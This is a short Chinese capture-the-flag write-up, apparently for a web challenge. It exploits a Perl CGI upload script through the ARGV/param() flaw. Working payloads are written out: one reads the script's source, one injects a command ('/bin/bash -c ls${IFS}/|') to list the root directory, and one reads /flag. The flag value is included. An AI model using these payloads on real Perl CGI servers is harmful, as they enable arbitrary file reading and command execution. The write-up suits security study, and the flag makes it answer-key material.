拿到题目看了看源码试了下文件上传,都没什么用
看了一下别的wp发现以.pl结尾的都是perl编写的网页文件
而perl上传代码使用了param()函数,的话就可能有漏洞了
ARGV 是 Perl 中的一个内置变量,用于获取命令行参数。它可以接受从命令行传递过来的参数,并将它们传递给 Perl 脚本。然而,当不正确地使用 ARGV 变量时,可能会导致安全漏洞,例如任意文件读取和任意命令执行。
我们猜测/cgi-bin/file.pl的路径是在/var/www/cgi-bin/file.pl,所以构造playload:?/var/www/cgi-bin/file.pl
并且把上传的文件复制一下贴在前面,并且把文件名和内容删除,在到下面添加一个ARGV
得到了php源码,发现的确用了param()函数
use strict;
use warnings;
use CGI;
my $cgi = CGI->new;
if ($cgi->upload('file')) {
my $file = $cgi->param('file');
while (<$file>) {
print "$_";
print "<br />";
}
}
再构造playload:l?/bin/bash%20-c%20ls${IFS}/|列出bin下的文件,找到了/flag
再构造playload:/flag
得到flag :cyberpeace{4b5da6ba64a372cf1cb7672774d5d310}